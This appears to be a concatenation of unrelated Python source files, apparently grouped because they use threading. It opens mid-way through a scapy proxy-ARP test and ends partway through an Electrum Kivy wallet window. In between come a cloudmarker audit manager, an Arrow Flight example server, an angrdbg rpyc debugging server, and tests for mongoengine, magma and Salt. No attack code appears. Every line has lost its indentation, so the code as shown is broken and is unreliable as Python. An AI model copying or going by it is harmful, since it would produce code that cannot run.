ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
#adding 5 non-existing host IPs to hostip list
for i in range(1,6):
ip = hostip[-1].split('.')
ip[3] = str(int(ip[3])+int(i))
ip = '.'.join(ip)
hostip.append(ip)
hostmac.append(RandMAC()._fix())
success_dir = {}
replied_hosts = []
def verify_proxyarp(*r):
ingress,hostmac,hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
replied_hosts.append(hostip)
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].psrc == hostip,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip,self.port_map[ingress]))
sendp(pkt, count = 10,iface = self.port_map[ingress])
t.join()
t = []
for i in range(10):
t.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t[i].start()
for i in range(10):
t[i].join()
if len(success_dir) != 5 and len(replied_hosts) != 5:
self.success = False
assert_equal(self.success, True)
for i in range(5):
if hostip[i] not in replied_hosts:
self.success = False
assert_equal(self.success, True)
|
manager.py
|
#!/usr/bin/env python
"""Manager of worker subprocesses.
This module invokes the worker subprocesses that perform the cloud
security monitoring tasks. Each worker subprocess wraps around a cloud,
store, event, or alert plugin and executes the plugin in a separate
subprocess.
"""
import copy
import logging.config
import multiprocessing as mp
import textwrap
import time
import schedule
import cloudmarker
from cloudmarker import baseconfig, util, workers
# Define module-level logger.
_log = logging.getLogger(__name__)
def main():
"""Run the framework based on the schedule."""
# Configure the logger as the first thing as per the base
# configuration. We need this to be the first thing, so that
# we can see the messages logged by util.load_config().
log_config = copy.deepcopy(baseconfig.config_dict['logger'])
log_config['handlers'] = {'console': log_config['handlers']['console']}
log_config['root']['handlers'] = ['console']
logging.config.dictConfig(log_config)
_log.info('Cloudmarker %s', cloudmarker.__version__)
# Parse the command line arguments and handle the options that can
# be handled immediately.
args = util.parse_cli()
if args.print_base_config:
print(baseconfig.config_yaml.strip())
return
# Now load user's configuration files.
config = util.load_config(args.config)
# Then configure the logger once again to honour any logger
# configuration defined in the user's configuration files.
logging.config.dictConfig(config['logger'])
_log.info('Cloudmarker %s; configured', cloudmarker.__version__)
# Finally, run the audits, either right now or as per a schedule,
# depending on the command line options.
if args.now:
_log.info('Starting job now')
_run(config)
else:
_log.info('Scheduled to run job everyday at %s', config['schedule'])
schedule.every().day.at(config['schedule']).do(_run, config)
while True:
schedule.run_pending()
time.sleep(60)
def _run(config):
"""Run the audits.
Arguments:
config (dict): Configuration dictionary.
"""
start_time = time.localtime()
_send_email(config.get('email'), 'all audits', start_time)
# Create an audit object for each audit configured to be run.
audit_version = time.strftime('%Y%m%d_%H%M%S', time.gmtime())
audits = []
for audit_key in config['run']:
audits.append(Audit(audit_key, audit_version, config))
# Start all audits.
for audit in audits:
audit.start()
# Wait for all audits to terminate.
for audit in audits:
audit.join()
end_time = time.localtime()
_send_email(config.get('email'), 'all audits', start_time, end_time)
class Audit:
"""Audit manager.
This class encapsulates a set of worker subprocesses and worker
input queues for a single audit configuration.
"""
def __init__(self, audit_key, audit_version, config):
"""Create an instance of :class:`Audit` from configuration.
A single audit definition (from a list of audit definitions
under the ``audits`` key in the configuration) is instantiated.
Each audit definition contains lists of cloud plugins, store
plugins, event plugins, and alert plugins. These plugins are
instantiated and multiprocessing queues are set up to take
records from one plugin and feed them to another plugin as per
the audit workflow.
Arguments:
audit_key (str): Key name for an audit configuration. This
key is looked for in ``config['audits']``.
audit_version (str): Audit version string.
config (dict): Configuration dictionary. This is the
entire configuration dictionary that contains
top-level keys named ``clouds``, ``stores``, ``events``,
``alerts``, ``audits``, ``run``, etc.
"""
self._start_time = time.localtime()
self._audit_key = audit_key
self._audit_version = audit_version
self._config = config
audit_config = config['audits'][audit_key]
# We keep all workers in these lists.
self._cloud_workers = []
self._store_workers = []
self._event_workers = []
self._alert_workers = []
# We keep all queues in these lists.
self._store_queues = []
self._event_queues = []
self._alert_queues = []
# Create alert workers and queues.
for plugin_key in audit_config.get('alerts', []):
input_queue = mp.Queue()
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
input_queue,
)
worker = mp.Process(target=workers.alert_worker, args=args)
self._alert_workers.append(worker)
self._alert_queues.append(input_queue)
# Create event_workers workers and queues.
for plugin_key in audit_config.get('events', []):
input_queue = mp.Queue()
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
input_queue,
self._alert_queues,
)
worker = mp.Process(target=workers.event_worker, args=args)
self._event_workers.append(worker)
self._event_queues.append(input_queue)
# Create store workers and queues.
for plugin_key in audit_config.get('stores', []):
input_queue = mp.Queue()
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
input_queue,
)
worker = mp.Process(target=workers.store_worker, args=args)
self._store_workers.append(worker)
self._store_queues.append(input_queue)
# Create cloud workers.
for plugin_key in audit_config.get('clouds', []):
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
self._store_queues + self._event_queues
)
worker = mp.Process(target=workers.cloud_worker, args=args)
self._cloud_workers.append(worker)
def start(self):
"""Start audit by starting all workers."""
_send_email(self._config.get('email'), self._audit_key,
self._start_time)
begin_record = {'com': {'record_type': 'begin_audit'}}
# Start store and alert workers first before cloud and event
# workers. See next comment to know why.
for w in self._store_workers + self._alert_workers:
w.start()
# We want to send begin_audit record to store/alert plugins
# before any cloud/event workers can send their records to them.
for q in self._store_queues + self._alert_queues:
q.put(begin_record)
# Now start the cloud and event workers.
for w in self._cloud_workers + self._event_workers:
w.start()
def join(self):
"""Wait until all workers terminate."""
# Wait for cloud workers to terminate.
for w in self._cloud_workers:
w.join()
end_record = {'com': {'record_type': 'end_audit'}}
# Stop store workers.
for q in self._store_queues:
q.put(end_record)
q.put(None)
# Stop event workers.
for q in self._event_queues:
q.put(None)
# Wait for store workers to terminate.
for w in self._store_workers:
w.join()
# Wait for event workers to terminate.
for w in self._event_workers:
w.join()
# Stop alert workers.
for q in self._alert_queues:
q.put(end_record)
q.put(None)
# Wait for alert workers to terminate.
for w in self._alert_workers:
w.join()
end_time = time.localtime()
_send_email(self._config.get('email'), self._audit_key,
self._start_time, end_time)
def _send_email(email_config, about, start_time, end_time=None):
"""Send email about job or audit that is starting or ending.
Arguments:
email_config (dict): Top-level email configuration dictionary.
about (str): A short string that says what the email
notification is about, e.g., ``'job'`` or ``'audit'``.
start_time (time.struct_time): Start time of job or audit.
end_time (time.struct_time): End time of job or audit. This
argument must not be specified if the job or audit is
starting.
"""
state = 'starting' if end_time is None else 'ending'
if email_config is None:
_log.info('Skipping email notification because email config is '
'missing; about: %s; state: %s', about, state)
return
_log.info('Sending email; about: %s; state: %s', about, state)
# This part of the content is common for both starting and
# ending states.
time_fmt = '%Y-%m-%d %H:%M:%S %z (%Z)'
content = """
About: {}
Started: {}
""".format(about, time.strftime(time_fmt, start_time))
content = textwrap.dedent(content).lstrip()
# This part of the content is added only for ending state.
if state == 'ending':
duration = time.mktime(end_time) - time.mktime(start_time)
mm, ss = divmod(duration, 60)
hh, mm = divmod(mm, 60)
end_content = """
Ended: {}
Duration: {:02.0f} h {:02.0f} m {:02.0f} s
""".format(time.strftime(time_fmt, end_time), hh, mm, ss)
content = content + textwrap.dedent(end_content).lstrip()
util.send_email(content=content, **email_config)
_log.info('Sent email; about: %s; state: %s', about, state)
|
server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""An example Flight Python server."""
import ast
import threading
import time
import pyarrow
import pyarrow.flight
class FlightServer(pyarrow.flight.FlightServerBase):
def __init__(self):
super(FlightServer, self).__init__()
self.flights = {}
@classmethod
def descriptor_to_key(self, descriptor):
return (descriptor.descriptor_type.value, descriptor.command,
tuple(descriptor.path or tuple()))
def list_flights(self, criteria):
for key, table in self.flights.items():
if key[1] is not None:
descriptor = \
pyarrow.flight.FlightDescriptor.for_command(key[1])
else:
descriptor = pyarrow.flight.FlightDescriptor.for_path(*key[2])
endpoints = [
pyarrow.flight.FlightEndpoint(repr(key),
[('localhost', 5005)]),
]
yield pyarrow.flight.FlightInfo(table.schema,
descriptor, endpoints,
table.num_rows, 0)
def get_flight_info(self, descriptor):
key = FlightServer.descriptor_to_key(descriptor)
if key in self.flights:
table = self.flights[key]
endpoints = [
pyarrow.flight.FlightEndpoint(repr(key),
[('localhost', 5005)]),
]
return pyarrow.flight.FlightInfo(table.schema,
descriptor, endpoints,
table.num_rows, 0)
raise KeyError('Flight not found.')
def do_put(self, descriptor, reader):
key = FlightServer.descriptor_to_key(descriptor)
print(key)
self.flights[key] = reader.read_all()
print(self.flights[key])
def do_get(self, ticket):
key = ast.literal_eval(ticket.ticket.decode())
if key not in self.flights:
return None
return pyarrow.flight.RecordBatchStream(self.flights[key])
def list_actions(self):
return [
("clear", "Clear the stored flights."),
("shutdown", "Shut down this server."),
]
def do_action(self, action):
if action.type == "clear":
raise NotImplementedError(
"{} is not implemented.".format(action.type))
else:
yield pyarrow.flight.Result(pyarrow.py_buffer(b'Shutdown!'))
# Shut down on background thread to avoid blocking current
# request
threading.Thread(target=self._shutdown).start()
def _shutdown(self):
"""Shut down after a delay."""
print("Server is shutting down...")
time.sleep(2)
self.shutdown()
def main():
server = FlightServer()
server.run(5005)
if __name__ == '__main__':
main()
|
test_session.py
|
import threading
import unittest
from mongoengine import sessions
class SessionTest(unittest.TestCase):
def tearDown(self):
sessions.clear_all()
def test_set_get_local_session(self):
session = {"db": "1"}
sessions.set_local_session("test", session)
self.assertEqual(session, sessions.get_local_session("test"))
session2 = {"db": "2"}
sessions.set_local_session("test2", session2)
self.assertEqual(session2, sessions.get_local_session("test2"))
self.assertNotEqual(
sessions.get_local_session("test2"), sessions.get_local_session("test")
)
sessions.clear_local_session("test")
self.assertIsNone(sessions.get_local_session("test"))
sessions.clear_local_session("test2")
self.assertIsNone(sessions.get_local_session("test2"))
def test_set_get_local_session_multi_threads(self):
def new_session(i):
db_alias = "test"
session = {"db": i}
sessions.set_local_session(db_alias, session)
self.assertEqual(i, sessions.get_local_session(db_alias)["db"])
sessions.clear_local_session(db_alias)
threads = []
for i in range(10):
t = threading.Thread(target=new_session, args=(i,))
threads.append(t)
# Start them all
for thread in threads:
thread.start()
# Wait for all to complete
for thread in threads:
thread.join()
if __name__ == "__main__":
unittest.main()
|
start_pipelined.py
|
"""
Copyright (c) 2018-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import logging
import threading
import subprocess
from enum import Enum
from collections import namedtuple
from concurrent.futures import Future
from magma.pipelined.rule_mappers import RuleIDToNumMapper
from magma.pipelined.app.base import MagmaController
from magma.pipelined.tests.app.exceptions import ServiceRunningError,\
BadConfigError
from ryu.base.app_manager import AppManager
from ryu.lib import hub
class TestSetup(object):
"""
The TestSetup class variables
apps: [Controller]: ryu apps to instantiate
references: [Controller]: futures to get references of
instantiated apps
config: dict: config for ryu app
mconfig: dict: mconfig for ryu app
service_manager: ServiceManager: service manager for ryu app
integ_test: bool: set true when running tests in
integ setting
"""
def __init__(self, apps, references, config, mconfig, loop,
service_manager, integ_test=False, rpc_stubs=None):
self.apps = apps
self.references = references
self.config = config
self.mconfig = mconfig
self.service_manager = service_manager
self.loop = loop
self.integ_test = integ_test
if rpc_stubs is None:
rpc_stubs = {}
self.rpc_stubs = rpc_stubs
Controller = namedtuple('Controller', ['name', 'app_future'])
class PipelinedController(Enum):
InOut = Controller(
'magma.pipelined.app.inout', 'inout'
)
Enforcement = Controller(
'magma.pipelined.app.enforcement', 'enforcement'
)
Enforcement_stats = Controller(
'magma.pipelined.app.enforcement_stats', 'enforcement_stats'
)
Testing = Controller(
'magma.pipelined.app.testing', 'testing'
)
Meter = Controller(
'magma.pipelined.app.meter', 'meter'
)
MeterStats = Controller(
'magma.pipelined.app.meter_stats', 'meter_stats'
)
AccessControl = Controller(
'magma.pipelined.app.access_control', 'access_control'
)
Subscriber = Controller(
'magma.pipelined.app.subscriber', 'subscriber'
)
def assert_pipelined_not_running():
"""
As Ryu applications shoudn't be started if the magma@pipelined service is
running we need to verify if pipelined is active. If service is running
throws a ServiceRunningError exception.
This can be done using the command:
systemctl is-active magma@pipelined
If service is pipelined, this returns an error code 3 & message "inactive"
"""
try:
output = subprocess.check_output(
["systemctl", "is-active", "magma@pipelined"]
)
except subprocess.CalledProcessError as e:
if "inactive" not in str(e.output, 'utf-8'):
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"caused an error code %d, exception - %s"
% (e.returncode, str(e.output, 'utf-8').strip())
)
else:
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"output - %s" % str(output, 'utf-8').strip()
)
def assert_valid_test_setup_config(test_setup):
"""
Verify the TestSetup config. If TestSetup is Invalid throw an exception.
Checks that references are also present in apps
Checks that apps and references don't have duplicates
"""
for ref in test_setup.references:
if ref not in test_setup.apps:
raise BadConfigError("TestSetup reference %s not in apps" % ref)
if (len(test_setup.apps) != len(set(test_setup.apps))):
raise BadConfigError("TestSetup apps can't contain duplicates")
class StartThread(object):
"""
Starts ryu applications
Uses ryu hub and ryu app_manager to launch ryu applications. By using
futures get references to the instantiated apps. This allows unittests to
call methods from pipelined apps.
"""
_Event = namedtuple('_Event', ['func', 'future'])
def __init__(self, test_setup, launch_successful_future):
""" If verification fails throw an exception, don't start ryu apps """
if test_setup.integ_test is False:
hub.patch(thread=True)
assert_pipelined_not_running()
assert_valid_test_setup_config(test_setup)
self._test_setup = test_setup
self.keep_running = True
self.done = False
self.event_queue = hub.Queue()
thread = threading.Thread(
target=self.start_ryu_apps, args=(launch_successful_future,))
thread.daemon = True
thread.start()
def start_ryu_apps(self, launch_successful_future):
"""
Starts up ryu applications, all the configuration is parsed from the
test_setup config provided in the unit test.
If apps throw an exception on launch, error is passed in the
launch_successful_future and will prevent infinitely waiting.
"""
self.reset_static_vars()
hub.spawn(self._process_queue)
app_lists = [a.value.name for a in self._test_setup.apps]
app_futures = {
controller.value.app_future: future
for (controller, future) in self._test_setup.references.items()
}
manager = AppManager.get_instance()
manager.load_apps(app_lists)
contexts = manager.create_contexts()
contexts['sids_by_ip'] = {} # shared by both metering apps
contexts['rule_id_mapper'] = RuleIDToNumMapper()
contexts['session_rule_version_mapper'] = \
self._test_setup.service_manager.session_rule_version_mapper
contexts['app_futures'] = app_futures
contexts['config'] = self._test_setup.config
contexts['mconfig'] = self._test_setup.mconfig
contexts['loop'] = self._test_setup.loop
contexts['rpc_stubs'] = self._test_setup.rpc_stubs
contexts['service_manager'] = self._test_setup.service_manager
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s %(levelname)s %(name)s] %(message)s')
services = []
try:
services.extend(manager.instantiate_apps(**contexts))
except Exception as e:
launch_successful_future.set_result(
"Ryu apps launch exception: {}".format(e))
raise
launch_successful_future.set_result("Setup successful")
self.run(manager)
def _process_queue(self):
"""
Run a queue to process external events that need to be run in the Ryu
greenthread
"""
while self.keep_running:
try:
event = self.event_queue.get(block=False)
val = event.func()
event.future.set_result(val)
except hub.QueueEmpty:
pass
finally:
hub.sleep(0.1)
def run_in_greenthread(self, func):
"""
When not monkey patching (i.e. when running a gRPC server), you cannot
call directly into a Ryu app. To do this, there needs to be a boundary
between futures and hub.Queues. When this function is called, a lambda
is passed which is sent into a queue to be run by the Ryu greenthread.
"""
ev = self._Event(func=func, future=Future())
self.event_queue.put(ev)
return ev.future.result()
def run(self, manager):
""" Keep running until signalled from test file """
while self.keep_running:
hub.sleep(1)
manager.close()
self.done = True
def reset_static_vars(self):
""" Reset static vars for running nosetests """
AppManager._instance = AppManager()
MagmaController.TABLES = {}
|
server.py
|
#!/usr/bin/env python
######################################################
# Author: Andrea Fioraldi <andreafioraldi@gmail.com> #
# License: BSD 2-Clause #
######################################################
"""
classic rpyc server running a SlaveService + angrdbg + IPython shell
usage:
angrdbg-srv.py # default settings
angrdbg-srv.py --host HOST --port PORT # custom settings
# ssl-authenticated server (keyfile and certfile are required)
angrdbg-srv.py --ssl-keyfile keyfile.pem --ssl-certfile certfile.pem --ssl-cafile cafile.pem
"""
import sys
import os
import rpyc
import threading
import signal
import Queue
from plumbum import cli
from rpyc.utils.server import Server
from rpyc.utils.classic import DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT
from rpyc.utils.registry import REGISTRY_PORT
from rpyc.utils.registry import UDPRegistryClient, TCPRegistryClient
from rpyc.utils.authenticators import SSLAuthenticator
from rpyc.lib import setup_logger
from rpyc.core import SlaveService
BANNER = "[angrdbg server v1.0]"
#######################
import angr
import claripy
import pyvex
import angrdbg
import IPython
#from angrdbg import *
#######################
class WeirdServer(Server): # n1 threaded n2 forked
def __init__(self, service, done_event, **kwargs):
self.num_conns = 2
self.thread = None
self.proc = None
self.done_event = done_event
Server.__init__(self, service, **kwargs)
@classmethod
def _handle_sigchld(cls, signum, unused):
try:
while True:
pid, dummy = os.waitpid(-1, os.WNOHANG)
if pid <= 0:
break
except OSError:
pass
# re-register signal handler (see man signal(2), under Portability)
signal.signal(signal.SIGCHLD, cls._handle_sigchld)
def _accept_method(self, sock):
self.num_conns -= 1
if self.num_conns == 1:
t = threading.Thread(
target=self._authenticate_and_serve_client,
args=[sock])
t.start()
self.thread = t
else:
pid = os.fork()
if pid == 0:
# child
try:
self.logger.debug("child process created")
# 76: call signal.siginterrupt(False) in forked child
signal.siginterrupt(signal.SIGCHLD, False)
self.listener.close()
self.clients.clear()
self._authenticate_and_serve_client(sock)
except BaseException:
self.logger.exception(
"child process terminated abnormally")
else:
self.logger.debug("child process terminated")
finally:
self.logger.debug("child terminated")
os._exit(0)
else:
# parent
self.proc = pid
sock.close()
if self.num_conns == 0:
self.done_event.set()
self.listener.close()
self.join()
def join(self):
self.thread.join()
try:
pid, dummy = os.waitpid(self.proc, 0) # os.WNOHANG)
except OSError as ee:
print ee
class AngrDbgServer(cli.Application):
port = cli.SwitchAttr(["-p", "--port"], cli.Range(0, 65535), default=None,
help="The TCP listener port (default = %s, default for SSL = %s)" %
(DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT), group="Socket Options")
host = cli.SwitchAttr(
["--host"],
str,
default="127.0.0.1",
help="The host to bind to. "
"The default is INADDR_ANY",
group="Socket Options")
ipv6 = cli.Flag(["--ipv6"], help="Enable IPv6", group="Socket Options")
logfile = cli.SwitchAttr(
"--logfile",
str,
default=None,
help="Specify the log file to use; "
"the default is stderr",
group="Logging")
quiet = cli.Flag(["-q",
"--quiet"],
help="Quiet mode (only errors will be logged)",
group="Logging")
ssl_keyfile = cli.SwitchAttr(
"--ssl-keyfile",
cli.ExistingFile,
help="The keyfile to use for SSL. Required for SSL",
group="SSL",
requires=["--ssl-certfile"])
ssl_certfile = cli.SwitchAttr(
"--ssl-certfile",
cli.ExistingFile,
help="The certificate file to use for SSL. Required for SSL",
group="SSL",
requires=["--ssl-keyfile"])
ssl_cafile = cli.SwitchAttr(
"--ssl-cafile",
cli.ExistingFile,
help="The certificate authority chain file to use for SSL. Optional; enables client-side "
"authentication",
group="SSL",
requires=["--ssl-keyfile"])
auto_register = cli.Flag(
"--register",
help="Asks the server to attempt registering with "
"a registry server. By default, the server will not attempt to register",
group="Registry")
registry_type = cli.SwitchAttr(
"--registry-type",
cli.Set(
"UDP",
"TCP"),
default="UDP",
help="Specify a UDP or TCP registry",
group="Registry")
registry_port = cli.SwitchAttr(
"--registry-port",
cli.Range(
0,
65535),
default=REGISTRY_PORT,
help="The registry's UDP/TCP port",
group="Registry")
registry_host = cli.SwitchAttr(
"--registry-host",
str,
default=None,
help="The registry host machine. For UDP, the default is 255.255.255.255; "
"for TCP, a value is required",
group="Registry")
def main(self):
if self.registry_type == "UDP":
if self.registry_host is None:
self.registry_host = "255.255.255.255"
self.registrar = UDPRegistryClient(
ip=self.registry_host, port=self.registry_port)
else:
if self.registry_host is None:
raise ValueError(
"With TCP registry, you must specify --registry-host")
self.registrar = TCPRegistryClient(
ip=self.registry_host, port=self.registry_port)
if self.ssl_keyfile:
self.authenticator = SSLAuthenticator(
self.ssl_keyfile, self.ssl_certfile, self.ssl_cafile)
default_port = DEFAULT_SERVER_SSL_PORT
else:
self.authenticator = None
default_port = DEFAULT_SERVER_PORT
if self.port is None:
self.port = default_port
setup_logger(self.quiet, self.logfile)
sys.stdout.write(
BANNER + " starting at %s %s\n" %
(self.host, self.port))
sys.stdout.flush()
done_event = threading.Event()
srv = WeirdServer(
SlaveService,
done_event,
hostname=self.host,
port=self.port,
reuse_addr=True,
ipv6=self.ipv6,
authenticator=self.authenticator,
registrar=self.registrar,
auto_register=self.auto_register)
t = threading.Thread(target=self._serve, args=[srv])
t.start()
# wait for 2 connections
done_event.wait()
IPython.embed(
banner1=BANNER + " client connected\n",
banner2="", # "tip: call serve_all() on the client to have a full working shell here.",
exit_msg=BANNER + " shell closed.\nexiting...\n"
)
os.kill(srv.proc, signal.SIGKILL)
os._exit(0)
def _serve(self, srv):
srv.start()
sys.stdout.write("\n" + BANNER + " client disconnected.\nexiting...\n")
os._exit(0)
def main():
AngrDbgServer.run()
'''simple client
import rpyc
import thread
conn1 = rpyc.classic.connect("localhost")
conn2 = rpyc.classic.connect("localhost")
thread.start_new_thread(conn2.serve_all, tuple())
'''
|
test_event.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Pedro Algarvio (pedro@algarvio.me)`
tests.integration.modules.event
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libs
from __future__ import absolute_import
import time
import threading
# Import Salt Testing libs
from tests.support.case import ModuleCase
# Import salt libs
import salt.utils.event as event
# Import 3rd-party libs
from salt.ext.six.moves.queue import Queue, Empty # pylint: disable=import-error,no-name-in-module
class EventModuleTest(ModuleCase):
def __test_event_fire_master(self):
events = Queue()
def get_event(events):
me = event.MasterEvent(self.master_opts['sock_dir'], listen=True)
events.put_nowait(
me.get_event(wait=10, tag='salttest', full=False)
)
threading.Thread(target=get_event, args=(events,)).start()
time.sleep(1) # Allow multiprocessing.Process to start
ret = self.run_function(
'event.fire_master',
['event.fire_master: just test it!!!!', 'salttest']
)
self.assertTrue(ret)
eventfired = events.get(block=True, timeout=10)
self.assertIsNotNone(eventfired)
self.assertIn(
'event.fire_master: just test it!!!!', eventfired['data']
)
ret = self.run_function(
'event.fire_master',
['event.fire_master: just test it!!!!', 'salttest-miss']
)
self.assertTrue(ret)
with self.assertRaises(Empty):
eventfired = events.get(block=True, timeout=10)
def __test_event_fire(self):
events = Queue()
def get_event(events):
me = event.MinionEvent(self.minion_opts, listen=True)
events.put_nowait(
me.get_event(wait=10, tag='salttest', full=False)
)
threading.Thread(target=get_event, args=(events,)).start()
time.sleep(1) # Allow multiprocessing.Process to start
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest']
)
self.assertTrue(ret)
eventfired = events.get(block=True, timeout=10)
self.assertIsNotNone(eventfired)
self.assertIn('event.fire: just test it!!!!', eventfired)
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest-miss']
)
self.assertTrue(ret)
with self.assertRaises(Empty):
eventfired = events.get(block=True, timeout=10)
def __test_event_fire_ipc_mode_tcp(self):
events = Queue()
def get_event(events):
me = event.MinionEvent(self.sub_minion_opts, listen=True)
events.put_nowait(
me.get_event(wait=10, tag='salttest', full=False)
)
threading.Thread(target=get_event, args=(events,)).start()
time.sleep(1) # Allow multiprocessing.Process to start
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest'],
minion_tgt='sub_minion'
)
self.assertTrue(ret)
eventfired = events.get(block=True, timeout=10)
self.assertIsNotNone(eventfired)
self.assertIn('event.fire: just test it!!!!', eventfired)
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest-miss'],
minion_tgt='sub_minion'
)
self.assertTrue(ret)
with self.assertRaises(Empty):
eventfired = events.get(block=True, timeout=10)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
